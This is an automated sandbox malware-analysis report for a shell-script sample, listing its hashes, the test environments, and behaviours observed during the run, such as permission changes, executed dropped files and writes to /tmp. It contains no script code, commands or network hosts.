Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
14-11-2024 02:50
Static task
static1
Behavioral task
behavioral1
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
-
Size
10KB
-
MD5
aae1d5abee7934f0e4222cffef0b2329
-
SHA1
068230ae72391a90d17b4f8c26d9665b3c7971be
-
SHA256
9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d
-
SHA512
1e9c830304e2aded2bd79e88b10a4af93cc50ac5e1b627a042727a17d92546e521a2d20b99af77a18a60d8cef82498eb9295bc3d340fc76b38930b6e5356fc2b
-
SSDEEP
192:qovj7zA0N1Bx6yhxSWD8M8FBSSGgAap+mX4DGgAap+mXmDV8M8FBSHFj7zA031Bg:qovj7zA0VxV5SWZDWVDzlj7zA0c
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 26 IoCs
-
Processes:
curl: File opened for reading /proc/sys/crypto/fips_enabled
-
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97